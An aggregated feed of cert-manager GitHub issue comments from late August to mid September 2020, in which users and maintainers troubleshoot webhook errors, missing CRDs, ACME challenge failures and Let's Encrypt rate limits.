[2020-08-31 16:50] mansona commented on #3009
yikes @ddgenome that seems **very** complex 🙈

I was trying to get a simpler solution using "ambient permissions" because I happen to be using this cluster to do other things in my gcloud account so the permissions are setup correctly already, but I would say that following the [cert-manager docs to create a new service account](https://cert-manager.io/docs/configuration/acme/dns01/) and save that

[2020-08-31 17:15] ddgenome commented on #3009
I'm about to create a PR updating the cert-manager docs with workload identity details.

[2020-08-31 17:25] ddgenome commented on #3009
@mansona I'm not sure what you mean by "setting up a whole new subsystem". To use "ambient" permissions, i.e., the default credentials, just do not put a `serviceAccountSecretRef` in the issuer spec. How you provide the default credentials is where some complexity comes in. If this is a personal cluster where you have given all instances/nodes permissions to do everything, then nothing more need b

[2020-09-01 07:06] meyskens commented on #3210
You installed cert-manager using the static manifests then tried to install it again with helm, that will not work :wink:

[2020-09-01 07:43] meyskens commented on #3198
/close

[2020-09-01 07:43] #3198 closed

[2020-09-01 07:47] meyskens commented on #3217
When you're saying `getting a certificate across all namespaces` do you mean the certificate being created in all namespaces?
This isn't the case, the clusterissuer can be used in every namespace but the certificate resource is still namespace bound. If you need one certificate to be in multiple namespaces we reccomend looking at https://cert-manager.io/docs/faq/kubed/

[2020-09-01 08:00] meyskens commented on #3214
Seems to have been an ingress issue...

Going to close this as it is solved, feel free to /reopen if needed

/close

[2020-09-01 08:00] #3214 closed

[2020-09-01 13:40] mcfedr commented on #3237
Just had the exact same issue `... x509: certificate is valid for ip-172-31-176-102.eu-west-1.compute.internal, not cert-manager-webhook.cert-manager.svc` - I'm guessing this might be related to how fargate works? I'll have to move cert manager to normal nodes for the moment I guess.

[2020-09-01 13:52] #3236 closed

[2020-09-01 13:53] meyskens commented on #3237
I have no experience with fargate but the traffic from the Kubernetes controller to the cert-manager-webhook service somehow hits a HTTPS endpoint that isn't correct...

[2020-09-01 18:33] Raghubalam commented on #2379
I'm having issue with letsencrypt prod, the tls-secret that it creates should not have tls.crt empty, ca.crt shows empty too in working clusters so I think that may be fine. However, the empty tls.crt field is definitively the one causing Nginx to use fake certificate.

Cert-manager:

helm install \
  cert-manager \
  --namespace ingress-public \
  --version v0.13.0 \
  jetstack/cert-manager

clus

[2020-09-01 18:34] sam-cogan opened #3239 "Helm release stuck in pending-upgrade"
**Describe the bug**:
I have attempted to upgrade from v0.16.0 to v0.16.1. I am aware of the issue with CRD creation hanging and have updated to Helm 3.3.1 before doing this. Despite this, the release is hanging, and looking at Helm history I see this:

Tue Sep  1 18:20:01 2020        pending-upgrade cert-manager-v0.16.1    v0.16.1         Preparing upgrade

**Expected behaviour**:
Upgrade complet

[2020-09-01 18:43] Raghubalam commented on #2494
We are having  issue with  letsencrypt prod, the tls-secret that it creates should not have tls.crt empty, ca.crt shows empty too in working clusters so I think that may be fine. However, the empty tls.crt field is definitively the one causing Nginx to use fake certificate.

cluster-issuer.yaml

 apiVersion: cert-manager.io/v1alpha2
kind: ClusterIssuer
metadata:
  name: letsencrypt-prod
spec:
  ac

[2020-09-02 05:00] yogendra commented on #2741
I had similar issue.
TL;DR- I restarted deployment
[code]

Here is what I was doing:

1. Deployed Cert-Manager (helm.sh/chart: cert-manager-v0.16.0)
2. Created ClusterIssuer for LetEncrypt
3. Created ClusterIssuer for SelfSigned certs
4. Deployed contour ingress controller
6. Updated Sample application that used Let Encrypt ca certs for TLS traffic
7. Deployed Dex for authentication with ingress r

[2020-09-02 06:17] qfny88 commented on #3223
Does anyone can give some response for this issue please?

[2020-09-02 08:34] meyskens commented on #3121
Helm 3.3.1 is out!

/close

[2020-09-02 08:34] #3121 closed

[2020-09-02 08:37] PSTobiasMueller commented on #2969
I've the same problem.
I got the error: `Failed to initialize Vault client: error reading Kubernetes service account token from vault-issuer-token-zjsvc: error calling Vault server: Error making API request.`

But the Secret exists in the cert-manager namespace:
* kubectl get secret vault-issuer-token-zjsvc -n cert-manager
[code]
* cluster-issuer.yaml
[code]
* kubectl describe ClusterIssuer vault-

[2020-09-02 09:19] CzarMich commented on #1369
Any help here:
Am having similar error:
Here is my error log:

`1 controller.go:158] cert-manager/controller/CertificateRequestManager "msg"="re-queuing item  due to error processing" "error"="Internal error occurred: failed calling webhook \"webhook.cert-manager.io\": the server is currently unable to handle the request" "key"="cert-manager-test/selfsigned-cert"
I0902 07:58:55.216802       1 cont

[2020-09-02 12:38] afirth commented on #494
Doc PR: cert-manager/website#313

[2020-09-02 14:05] rootsh commented on #2319
I resolved using doc https://cert-manager.io/docs/installation/compatibility/#aws-eks

[2020-09-02 14:56] meyskens opened #3244 "Test internal conversion in webhook"
To prevent further issues like the one in #3242 we should add unit tests to server,go to test the behavior especially conversions, we should also add tests against our forked conversion tests.

[2020-09-02 14:58] meyskens commented on #3244
/priority important-soon

[2020-09-02 15:30] wallrj opened #3245 "Update krew plugin index with kubectl_cert-manager v1"
We should update the Krew index with the v1 CLI tool.

/kind feature
/milestone v1.0

[2020-09-02 15:31] wallrj commented on #3245
/milestone v1.0

[2020-09-02 16:48] munnerz commented on #3188
/assign

[2020-09-02 16:48] munnerz commented on #3188
/milestone v1.1

[2020-09-02 20:35] RobbieJVMW opened #3246 "no matches for kind "ClusterIssuer" in version "cert-manager.io/v1""
**Describe the bug**:
Following the installation instructions for OpenShift (https://cert-manager.io/docs/installation/openshift/#login-to-your-openshift-cluster).  The deployment completes successfully however `kind:ClusterIssuer` is not recognised.

**Expected behaviour**:
`kind: ClusterIssuer` recognised in the yaml.

**Steps to reproduce the bug**:
Using OpenShift 4.5.7 follow installation ins

[2020-09-03 01:48] qfny88 commented on #3223
no response here so duplicate this issue to kubernetes community:
https://github.com/kubernetes/community/issues/5093

[2020-09-03 03:32] vosuyak commented on #3246
I am also getting this error when upgrading to v1.0.0
`no matches for kind "ClusterIssuer" in version "cert-manager.io/v1`

[2020-09-03 05:21] meyskens commented on #3246
Can you get us the output of `kubectl get crd` and `kubectl describe crd clusterissuers.cert-manager.io`?

[2020-09-03 06:21] RobbieJVMW commented on #3246
attached..
[clusterissuers.txt](https://github.com/jetstack/cert-manager/files/5166580/clusterissuers.txt)
[crd.txt](https://github.com/jetstack/cert-manager/files/5166581/crd.txt)

[2020-09-03 10:00] wallrj commented on #3246
@RobbieJVMW we havn't finished updating the installation instructions for OpenShift. See https://github.com/cert-manager/website/pull/318

Is it possible that you've actually installed cert-manager 0.16.1? That previous version does not support the new V1 API.

[2020-09-03 10:58] RobbieJVMW commented on #3246
Sounds entirely possible - the install guide did point at a 0.16.1 .. look's like the doc has been updated.  I will re-test.

[2020-09-03 11:09] RobbieJVMW commented on #3246
yes, the new doc's pointing at the 1.0 release has resolved the issue.

[2020-09-03 11:09] #3246 closed

[2020-09-03 12:22] riccardodl opened #3247 "Document use of Azure Managed Identities for AzureDNS"
**Is your feature request related to a problem? Please describe.**

Support for Azure managed identities was added by this pull request and added to release [0.15.0](https://github.com/jetstack/cert-manager/releases/tag/v0.15.0). Unfortunately there is no documentation regarding use of MSI in the [official docs](https://cert-manager.io/docs/configuration/acme/dns01/azuredns/). I went looking aroun

[2020-09-03 16:15] vosuyak commented on #3246
Robbie please share the updated doc link, you have used to resolve this.

[2020-09-03 16:30] RobbieJVMW commented on #3246
The install guide on on cert-manager.io has been updated to link to the v1.0 deployment yaml.  I didn’t need to do anything apart from re-test using the new config.

[2020-09-03 17:30] kopaygorodsky commented on #1399
Status of webhook apiservice is false.
```v1beta1.webhook.cert-manager.io             cert-manager/cert-manager-webhook   False (ServiceNotFound) ```

This is the fix: `kubectl delete apiservice v1beta1.webhook.cert-manager.io`

[2020-09-03 17:31] anurag commented on #2741
We are running into this issue with v0.16 and v1.0.0, where no new ACME challenges are being created. Reverting `cert-manager-controller` to 0.15.2 fixes the issue.

[2020-09-03 17:42] vosuyak commented on #3246
[code]

This ClusterIssuer still does not working when following steps found here:
[cert-manager.io](https://cert-manager.io/docs/installation/kubernetes/)

Kube version: 1.18
Helm version: 3
Guide: Installation/Kubernetes

Error Response back:
`**no matches for kind "ClusterIssuer" in version "cert-manager.io/v1"**
`
@wallrj

[2020-09-03 20:39] ltetrel commented on #3021
Hi,

Sadly no. I rely on a certificate I manually asked from certbot and injected into the k8s cluster for now.
I am also trying with an http challenge without more success. This can maybe cause by our network configuration I can let you know.
Does the DNS challenge depends on the local network, or it is just relying on external server (cloudflare in our case) ?

[2020-09-04 03:34] chekinah commented on #2487
I am receiving this error:   1 controller.go:158] cert-manager/controller/orders "msg"="re-queuing item  due to error processing" "error"="error reading (cluster)issuer \"letsencrypt\": issuer.cert-manager.io \"letsencrypt\" not found" "key"="

Can anyone help?

[2020-09-04 06:12] FischlerA opened #3250 "Order gets stuck on failed after updating a Certificate from an invalid to a valid Dns/CommonName"
**Describe the bug**:
After Creating a Certificate with a wrong CommonName / DnsName (e.g. hello.k8) an Order is created. The order can not be completed as it gets declined by the ACME Server (e.g. Let's Encrypt).
After Updating the Certificate to have a valid CommonName/DnsName (e.g. hello.k8.fischler.eu) the Order is not Updated.
You need to delete and recreate the certificate (maybe even delete

[2020-09-04 08:02] wallrj commented on #3244
/assign @wallrj

I started working on this yesterday.

[2020-09-04 08:28] wallrj opened #3251 "cainjector fails to start if it can't list Certificates"
cainjector watches secrets, webhooks, customresources and Certificates as event sources for its controller-runtime based reconciliation queue.

As it starts up it  attempts to list all these resources to populate informer caches, before it begins reconciling any of them.
If any of these resources can not be listed then none of them are reconciled, which leads to a chicken-egg problem, in some case

[2020-09-04 08:36] munnerz commented on #3251
Possibly related to #3187?

[2020-09-04 10:27] kkorada commented on #2342
I have multiple ingress files in my helm chart. some ingress files have same sub domain but different path. So should I put TLS block for every ingress file ?

[2020-09-04 12:01] munnerz commented on #3251
Yeah, I think you may be correct... I should have documented this/commented it when adding support for injecting directly from Secret resources 🙈

[2020-09-04 12:04] meyskens commented on #3251
/milestone v1.0
/priority critical-urgent

[2020-09-04 12:10] wallrj commented on #3251
/assign @wallrj

[2020-09-04 13:13] kopaygorodsky commented on #3237
same issue here, on GKE without fargateprofile. Need to w8 a few minutes until all cert-manager pods are up and running.

[2020-09-04 13:16] kopaygorodsky commented on #3237
I've been able to create ClusterIssuer, but Certificate with acme is stuck.
[code]

[code]

In logs of operator on every sync time.

[2020-09-04 14:46] elliot-resdiary commented on #2752
When using `helm upgrade --install` rather than `helm install` for the intiial deployment we're seeing this error in any subsuquent deployments

[code]

AKS 1.16.10
cert-manager v0.15.2
helm/tiller v2.16.9

[2020-09-04 16:17] seunroava commented on #1399
Even that command didn't work for me @kopaygorodsky

nonroot@cloudshell:~/spinnaker$ kubectl delete apiservice v1beta1.webhook.cert-manager.io
Error from server (NotFound): apiservices.apiregistration.k8s.io "v1beta1.webhook.cert-manager.io" not found

[2020-09-04 16:25] #3251 closed

[2020-09-04 17:23] #3244 closed

[2020-09-04 19:38] kopaygorodsky commented on #1399
are there any other hung apiservices from cert-manager ?

[2020-09-05 12:57] seunroava commented on #1399
As far as I knew, nothing. But here is a solution that eventually worked for me:

`NAMESPACE=cert-manager`
[code]

I had implemented the first two steps earlier which didn't work. The third command finished it off for me.

Credit to Stackoverflow. Can't remember the link right now.

[2020-09-06 12:08] enhendrickson opened #3258 "CA Injector - Secret resource does not allow direct injection - refusing to inject CA for Webhook"
I'm not doing anything custom here.

**Kubernetes Version:** 1.17.9
**Kubernetes Platform:** Azure Kubernetes Service
**Cert Manager Version:** v1.0.1

Whether I install using helm or kubectl, the stock webhook isn't getting the CA from the injector, but (of course) the stock automatically generated secret has the annotation that the CA injector logs are complaining are not there:

**Final Symptom

[2020-09-06 18:03] christhomas commented on #2763
Is there any progress update on this ticket? From what I understand the ingress shim needs to be implemented in a generic way to allow pluggable implementations, but we need at least one starting solution to this, and then if istio wants to support this, what needs to happen on their side?

It's a pity this feature is missing cause right now I can't support https on istio gateways without it and I

[2020-09-06 18:10] meyskens commented on #3258
The ceertmanager.k8s.io annotations have been removed, can you set it to `cert-manager.io/allow-direct-injection: true` ?

[2020-09-06 19:34] docent-net commented on #3023
@jmgilman if this issue still persists - verify how you create the secret itself. Above error will also show when instead os stringData you'd use Data:

[code]

And the above problem might be hard to debug.

[2020-09-06 21:03] sslavic opened #3259 "Export controller processing errors counter"
**Is your feature request related to a problem? Please describe.**
Controller processing errors are not observable https://github.com/jetstack/cert-manager/blob/master/pkg/controller/controller.go#L157-L161

After a higher level component failed due to invalid certificate, debugging showed cert-manager was failing to update it
[code]
just like in https://github.com/jetstack/cert-manager/issues/249

[2020-09-06 21:04] enhendrickson commented on #3258
I can, but any reason why a new deployment would use the wrong annotation?  Is this something possibly left over from a previous install?  I'll try that now.  I'm sure that will work though... odd that it was not using the right one out of the box.

[2020-09-06 22:01] enhendrickson commented on #3258
That was it, but the reason it was hanging out with the old annotation was because a helm delete or a kubectl delete didn't delete the old webhook-ca secret.  Once I manually deleted the whole cert-manager namespace and restarted everything worked as expected.

[2020-09-06 22:01] #3258 closed

[2020-09-06 23:02] thehedgefrog commented on #3217
You're absolutely right, that's one big oops from me.  Thanks for the suggestion re. Kubed, works perfectly.

[2020-09-06 23:02] #3217 closed

[2020-09-07 03:11] aredridel opened #3260 "Ingress TLS generates CSR with null/bad EKU"
**Describe the bug**:

When generating a certificate for Ingress TLS, a CSR (and with smallstep/certificates 0.14.4, a certificate) is generated with a bad x509 EKU. (step-certificates 0.14.3 ignored the EKU requested and generated a TLS cert)

This Certificate

[code]

generates this request (and resulting certificate):

[code]

Notably the EKU is wrong:

[code]

**Expected behaviour**:

A TLS EK

[2020-09-07 03:12] aredridel commented on #3260
See https://github.com/smallstep/certificates/issues/365

[2020-09-07 04:36] 4ss3g4f opened #3261 "certificate ready false"
**Describe the bug**:
A clear and concise description of what the bug is.
Cetificate ready false
![image](https://user-images.githubusercontent.com/22811935/92347904-91b16100-f0fb-11ea-8532-c24731685c40.png)

**Expected behaviour**:
A concise description of what you expected to happen.
Cetificate ready true

**Steps to reproduce the bug**:
Steps to reproduce the bug should be clear and easily repr

[2020-09-07 06:09] jenting commented on #3012
I use the current latest cert-manager version `v1.0.1` to test it. The cert-manager will _watch_ the Secret resource now so cert-manager have the ability to get the latest Secret information.

However, the issue did not get fixed because what I expected behavior is the certificate should be renewed immediately. For example, the user sets the `renewBefore` as `6h`, then if the user manually changes

[2020-09-07 06:09] jenting commented on #3012
/reopen

[2020-09-07 07:36] 4ss3g4f commented on #3261
[code]

[2020-09-07 12:40] gudipudipradeep commented on #2811
`Error from server (InternalError): error when creating "clusterIssuer.yaml": Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://cert-manager-webhook.cert-manager.svc:443/mutate?timeout=30s: context deadline exceeded`
Getting above error.

[2020-09-07 13:35] avodaqstephan commented on #2763
Hi @christhomas,
I think no-one is actively working on this FR. Sadly I do not have time and not that much of experience with Go to build a solution.

[2020-09-07 14:05] rytswd opened #3263 "Copyright year shown as "YEAR"?"
**Describe the bug**:
When installing cert-manager CRD using the following file:
https://github.com/jetstack/cert-manager/releases/download/v1.0.1/cert-manager.yaml

I noticed the CRD containing `# Copyright YEAR The Jetstack cert-manager contributors.`

**Expected behaviour**:
Copyright should be showing `2020` or some relevant year rather than `YEAR`

**Steps to reproduce the bug**:

[code]

**A

[2020-09-07 21:49] nsteinmetz opened #3264 "[1.0.1] Issuer creation fails and ca-injector mentions "unable to update target object with new CA data""
**Describe the bug**:

When creating a new issuer after upgrade to 1.0.1, I have:

[code]

Installation of cert-manager worked as expected.

However:

In logs, pods seems working well except cert-manager-cainjector for which I have:

[code]

**Expected behaviour**:

Issuer should be created as expected

**Steps to reproduce the bug**:

Install cert-manager with helm (3.3.1)
I have the issue both w

[2020-09-07 22:11] nsteinmetz commented on #3264
Hmm seems the following of #3258 somehow.

The mutating webhook has managed fields onl for V1 but not for v1/beta1. the validating webhook has both (see below).

[code]
Whereas the one below has ManagedFields for the 2 api version

[code]

[2020-09-07 23:29] ser60v commented on #3133
No progress on this issue? I'm hung up on a similar one.

[2020-09-07 23:54] ser60v opened #3265 "Internal error occurred: failed calling webhook connect: no route to host"
[code]

**Steps to reproduce the bug**:
Use this manual:
https://cert-manager.io/docs/installation/kubernetes/
kubectl apply --validate=false -f https://github.com/jetstack/cert-manager/releases/download/v1.0.1/cert-manager.yaml
kubectl apply --validate=false -f https://github.com/jetstack/cert-manager/releases/download/v1.0.1/cert-manager.crds.yaml

Pods are running

[code]

[code]

I raised the

[2020-09-08 06:28] nsteinmetz commented on #3264
Weird, I have the same issue with v0.16.1 too whereas it worked previously :thinking:

[2020-09-08 06:38] meyskens commented on #3263
It's a known issue that was introduced when we started licensing the static manifests (we didn't do this pre 0.14) it is something in Bazel (https://github.com/jetstack/cert-manager/blob/master/deploy/manifests/BUILD.bazel#L62) not replacing the year.

/milestone v1.1
/area deploy
/priority important-longterm

[2020-09-08 06:43] meyskens commented on #2763
@JoshVanL is working on a controller to assist with Istio. Not sure if it will help with this also.

[2020-09-08 06:44] meyskens commented on #3265
This seems to be a problem with your CNI of your cluster.

/triage support

[2020-09-08 06:47] meyskens commented on #3246
@vosuyak what do you see for `kubectl describe crd clusterissuers.cert-manager.io` ?

[2020-09-08 06:48] meyskens commented on #3021
It needs valid DNS resolvers to look up the SOA record to find the zone to use in Cloudflare

[2020-09-08 07:33] Smana commented on #2166
No unfortunately, we still face this issue. We have to build the whole chain and mount it as a secret. It's really painful

[2020-09-08 07:34] meyskens commented on #3261
Have you tried following https://cert-manager.io/docs/faq/acme/?

/triage support
/remove-kind bug

[2020-09-08 10:18] rytswd commented on #3263
Thanks for the confirmation, it looks like the `licensed_file` macro is being triggered with static input of `//hack/boilerplate:boilerplate.bzl.txt` - I suppose the intention was for `licensed_file` macro to handle the replacement?

I could have a look at this, but I also wonder it may be easier to simply add the static year input `2020` to the boilerplate, and use some automation like GitHub Act

[2020-09-08 11:12] meyskens commented on #3263
I would prefer licensed_file or maybe a licensed_file_year to add this. It is less friction and I'd try to avoid adding another CI tool just to do this.

[2020-09-08 21:20] bergkvist commented on #656
@rbq I have the same problem as you it seems. I can't reach the endpoint from within the cluster, but I can reach it from my local workstation.

From within the cluster vs from local workstation:
![image](https://user-images.githubusercontent.com/410028/92528716-82c8cc80-f229-11ea-8775-56a423364095.png)

How did you fix it?

[2020-09-08 21:34] bergkvist commented on #656
Turns out the internal services in the cluster were not able to reach itself through external IP because I had enabled PROXY protcol in my load balancer.

When I disabled PROXY protocol, the certificates were issued almost immediately.
[code]

Which meant I could turn PROXY protocol back on:
[code]

My application requires the use of PROXY protocol in order to check the users IP address. Is there

[2020-09-09 10:09] zz40404991 opened #3266 "Existing issued Secret is not up to date for spec: [spec.dnsNames]"
Where should dnsNames be added?

[code]

[code]

[2020-09-09 10:14] barclayadam opened #3267 "Rate limits when requesting Authorisations from LetsEncrypt not handled"
**Describe the bug**:

The naming of the certificate and/or secret to store the TLS certificate can affect the ability of cert-manager to generate certificates.

https://gist.github.com/barclayadam/40a81185b31a4266552f10f784146548

That above gist contains some details regarding that issue, including:

- Some logs obtained trying to create a certificate. The only thing that appears to be output re

[2020-09-09 11:45] barclayadam commented on #3267
I've been doing some further investigations here, and I believe the issue is not as I expected. It actually appears to be the domain name itself.

I've updated the first with some more files:

`admin.yaml`: A `Certificate` that does NOT work
`admin2.yaml`: A `Certificate` that does work
`admin3.yaml`: A `Certificate` that does NOT work

I created the above 3 resources to show differences between `

[2020-09-09 12:16] adn77 commented on #3267
I am experiencing similar issues.
@barclayadam  what I notice from your certificates, you reference two different API versions /v1 vs. /v1alpha2

[2020-09-09 12:19] barclayadam commented on #3267
@adn77 When creating the resources I always specify `v1`, but when viewing from Kubernetes (using Lens) they appear to actually be `v1alpha2`

[2020-09-09 13:37] james-w commented on #3267
https://kubernetes.slack.com/archives/C4NV3DWUC/p1599591536179100

I am kind of stumped, looking at the logs suggests it is exiting between lines 195 and 210 of https://github.com/jetstack/cert-manager/blob/master/pkg/controller/acmeorders/sync.go#L195 and I can't see how that is possible without an error being logged.

[2020-09-09 14:50] HaveFun83 commented on #3264
same here

[2020-09-10 02:53] mkxxq commented on #540
the document link is here: https://cert-manager.io/docs/faq/cluster-resource/

[2020-09-10 10:11] barclayadam commented on #3267
To confirm directly in this issue: The problem appears to be the (mis)handling of rate limits when trying to create Authorisations for a domain. I had been using the production Lets Encrypt provider during testing and hit 2 rate limits according to 'letsdebug.com` (number of identical certs plus certs per domain).

Using other domain names worked perfectly.

I've updated the title to reflect this

[2020-09-10 10:45] manast opened #3270 "Unable to get DNS01 ACME Challenge to work on a production environment"
Ok, this has been 3 days of hair pulling and all kind of checks, tests and so on. However I just concluded that I need help, I am begging on my knees, imploring for help (yes I am desperate).

**Describe the bug**:
I have a simple setup for generating 1 TLS certificate using DNS01 ACME challenge. This same setup works when using letsencript stage environment, but gets stuck in the Order, no events

[2020-09-10 10:46] infa-ddeore commented on #2159
this should be addressed, cant the issue be reopened?

[2020-09-10 11:55] Daynnnnn commented on #3267
We're having the same issue too! For anyone wanting a quick fix while this gets sorted, scaling down cert-manager to 0 pods for 15 minutes then bringing it back up seems to clear the issue for around a day for us.

[2020-09-10 13:27] makuhama opened #3272 "Documentation flaw concerning how propagation check is performed during DNS01"
[Documentation](https://cert-manager.io/docs/configuration/acme/dns01/) states:

Doing domain verification with DNS01 redirecting `_acme-challenge...` Domain-Name to some subdomain of `auth.acme-dns.io` I encountered
[code]
`46.4.128.227`is the IPv4 address of `auth.acme-dns.io`. Access to arbitrary DNS servers is blocked in my enterprise environment. I was able to work around this issue with `--d

[2020-09-10 13:27] C3po23 opened #3273 "Challenge POD not created & HTTP error 308 on the resolver ingress url"
Hello everyone,

I am quite stuck in deploying the cert-manager with a private ACME server ...

The clusterissuer is in ready state such as the cert manager ressrouce and my application ressources but the certificate, order and challenge stay in a invalid state.

What we noticed is that the resolver pods was never created and that the ingress resolver url return a 308 error ...

**Describe the bug

[2020-09-10 15:12] adinhodovic commented on #2752
Try removing the secret `cert-manager-webhook-ca`. It will be regenerated and the restart the `cert-manager-webhook` pod.

[2020-09-10 17:48] sindrepm commented on #3267
I can confirm the same issue. Suddenly certificates started to fail for no apparent reason. Spent a day debugging until finally figured out it was due to Let's Encrypt rate limit. Would be nice if this error could be handled in code and surfaced in the `Order` status. Currently it just fails silently and order status is completely empty.

[2020-09-10 19:58] kvaps opened #3274 "csr key usages do not match specified usages, these should match if both are set: [[]certmanager.KeyUsage[3] != []certmanager.KeyUsage[4]]"
**Describe the bug**:
cert-manager does not want to issue certificate:

[code]

**Expected behaviour**:
Certificate is "Ready"

**Steps to reproduce the bug**:

try:
[code]

or

[code]

both are not working

**Anything else we need to know?**:

**Environment details:**:
- Kubernetes version v1.19.0
- Cloud-provider/provisioner: kubeadm
- cert-manager version: v1.0.0, v.1.0.1, v0.16.1
- Install met

[2020-09-10 20:14] meyskens commented on #3274
"Signing" and "digital signature" are the same, removing 1 of them will solve this. However our code should handle removing this double better.

/priority important-soon
/area api

[2020-09-10 20:16] kvaps commented on #3274
Thanks, I can append that `v0.15.2` handling this fine.

[2020-09-11 01:38] lightswitch05 commented on #3272
I just hit this issue too in Caddy's https://github.com/caddy-dns/cloudflare - port 53 is blocked to all external servers

[2020-09-11 02:29] ashleydavies commented on #656
Huge thanks @bergkvist, same issue here.

[2020-09-11 10:41] rajatvig commented on #3267
Getting bit by the same issues but unsure how to go about it. The failing certificate request remains stuck even after it is the only one in queue, did a manual scale up/down of the controller and removed the older order.

[2020-09-11 11:59] sindrepm commented on #3267
In my case I just had to wait 24 hours or so until the limit was lifted. Then the cert was issued.

You can use https://letsdebug.net to check the status of the order at LE.

[2020-09-11 12:02] proligde commented on #3246
@vosuyak Had the same problem but found out that in the newer versions when using HELM the cluster CRDs are not installed by default. It worked after uninstalling an reinstalling with:

[code]

note the --set installCRDs=true at the end.

Hope this helps.

[2020-09-11 12:22] manast commented on #3270
@meyskens any chance you could give me a hint on how to debug this further? 🙏

[2020-09-11 14:13] fsniper commented on #3274
We also hit this issue with this CR:
[code]

The error message is:
[code]

[2020-09-11 15:23] gudipudipradeep opened #3276 "context deadline exceeded Post https://cert-manager-webhook.ingress-basic.svc:443/mutate?timeout=30s"
Getting following issue in Azure aks cluster. Please give some suggestion to fix the issue.
`
Error from server (InternalError): error when creating "cert-manager.yaml": Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://cert-manager-webhook.ingress-basic.svc:443/mutate?timeout=30s: context deadline exceeded
`
Using Kuberntes: 1.16.0

[2020-09-12 10:41] timfeirg commented on #3270
I also have roughly the same issue here, but i got an empty event list from the `kubectl get CertificateRequest --all-namespaces` output, also curious on how to debug further

[2020-09-12 15:04] rajatvig commented on #3270
You can use https://letsdebug.net to check the status of the order at LE.

It is related to rate limits issue also documented at
https://github.com/jetstack/cert-manager/issues/3267#issuecomment-691051505

On Sat, Sep 12, 2020 at 11:41 AM timfeirg <notifications@github.com> wrote:

--
Sent from Gmail Mobile

[2020-09-13 16:26] fiberoptic89 commented on #843
I am also requesting .PEM format support. I am using dovecot inside a docker image that runs inside a k8 pod.

[2020-09-14 04:26] timfeirg opened #3277 "no events described in CertificateRequest, no order created, no apparent error messages printed"
**Describe the bug**:

I recently upgraded cert-manager from v0.15.2 to v1.0.1, and it stopped working altogether. while I'm not yet able to decide the cause of it, I wasn't able to debug further due to lack of error logs. there are:

* no events listed in kubectl describe CertificateRequest
* no relevant events from `kubectl get events -n kube-system`
* orders are created but there's no events in

[2020-09-14 08:51] james-w commented on #3277
Would you share the output of `kubectl get certificaterequest -o yaml` for one of the failing requests please?

[2020-09-14 08:58] meyskens commented on #3274
@fsniper i cannot seem to reproduce that one, it works fine in my test cluster. Do you mind trying to isolate it to be reproducible?

[2020-09-14 10:37] nsteinmetz commented on #3264
@meyskens hello, as you worked on #2952, could you please confirm if my guess is right or wrong ? And if yes, could you please fix the issue or provide instructions ?

[2020-09-14 11:58] meyskens commented on #2701
This should now be better in v1.0 as we now handle these ourselves instead of the Go library doing it.

Going to close this, feel free to /reopen if needed.

/close

[2020-09-14 11:58] #2701 closed

[2020-09-14 11:59] meyskens commented on #2549
We now have a great talk on this by @endocrimes and code at https://github.com/endocrimes/cert-manager-community-day
Just waiting for a PR to the documentation to link it :wink:

[2020-09-14 13:11] meyskens commented on #3264
Don't think it is related to that PR. The errors in your logs seem weird to have a UUID mismatch... Does this happen still when you delete and reinstall the mutating webhook?

[2020-09-14 13:24] meyskens commented on #843
now we have `certificate.spec.keystores` we can start thinking about adding these under there

[2020-09-14 13:25] meyskens commented on #3276
/triage support

seems the Kubernetes controller is unable to reach the cert-manager-webhook service.

[2020-09-14 13:26] endocrimes commented on #2549
@meyskens IIRC there used to be a section for this in the docs, but I can't figure out where it should go now :( - Any suggestions?

[2020-09-14 13:28] meyskens commented on #3270
Seems to be something at Let's Encrypt as it isn't giving you authorizations...

[2020-09-14 13:33] meyskens commented on #2549
@endocrimes I think https://github.com/cert-manager/website/tree/master/content/en/docs/usage is the perfect place!

[2020-09-14 13:53] meyskens commented on #3272
Addressed in https://github.com/cert-manager/website/pull/327

Since this isn't the documentation repo I am going to close this issue here.
/close

@lightswitch05 while I like Caddy a lot we are not related, I suggest filing an issue with them.

[2020-09-14 13:53] #3272 closed

[2020-09-14 13:54] nsteinmetz commented on #3264
@meyskens

Thanks for your rapid answer.

Unfortunatelay, I deleted once more 1.0.1 release, checked that both webhooks were gone and reinstalled and still same issue.

[code]

[2020-09-14 13:59] meyskens commented on #3264
we use the v1 version now, the Kubernetes API should convert between v1beta1 and v1 for you.

[2020-09-14 14:01] meyskens commented on #3266
`dnsNames` is a property on the Certificate resource: https://cert-manager.io/docs/usage/certificate/

/triage support

[2020-09-14 14:04] meyskens commented on #3273
Can you try to follow https://cert-manager.io/docs/faq/troubleshooting/ ?

/remove-kind bug
/triage support

[2020-09-14 14:20] meyskens commented on #3023
Closing this as the documentation and errors have been improved. Feel free to /reopen

/close

[2020-09-14 14:20] #3023 closed

[2020-09-14 14:26] meyskens commented on #3239
I think this is a Helm bug rather than cert-manager. I don't think we can do much about this in our chart.

[2020-09-14 14:31] sam-cogan commented on #3239
Sorry, should have come back on this. This is a Terraform issue, the provider is still using an older helm version and needs updating.

[2020-09-14 14:31] #3239 closed

[2020-09-14 14:33] C3po23 commented on #3273
Hello @meyskens

I already follow your link, it's this one which make me noted that the solver pod is not scheduled:

HTTP01 troubleshooting

- you can access the URL from the public internet : **No Access, no ingress created**

- the the ACME solver pod is up and running : **solver Pod not scheduled and thus not running**

- use kubectl describe ingress to check the status of the HTTP01 solver in

[2020-09-14 14:41] meyskens commented on #3273
I see you use an internal ACME server, what software are you running for that? Seems the ACME instance does not reply correct to the GET call to the challenge.

[2020-09-14 14:45] meyskens commented on #2319
@wallrj is working on this in https://github.com/cert-manager/website/issues/321.
Let's move the convesation there.

/close

[2020-09-14 14:45] #2319 closed

[2020-09-14 14:46] youyongsong commented on #3185
I also encountered the same problem, could anyone help troubleshoot this problem?

here's the cert-manager-webhook's log:

[code]

[2020-09-14 14:48] cihangirbesiktas commented on #3274
@meyskens I am working with @fsniper and we're having this issue for the below certificate.
`apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
  name: cb02-selfsigned-issuer
  namespace: qatest
spec:
  selfSigned: {}`

`apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: cb02-ca-certificate
  namespace: qatest
spec:
  commonName: cb02-ca-certificate
  duration: 87660h0m0s
  isCA

[2020-09-14 15:10] meyskens commented on #3274
@cihangirbesiktas

can you try
[code]

`signing` and `digital signature` are the same, they somehow got duplicated in the upstream Kubernetes CSR API. That is fixed in a PR I filed

[2020-09-14 15:12] furkatgofurov7 opened #3281 "cert-manager-cainjector and cert-manager-webhook pods are not running properly"
**Describe the bug**:
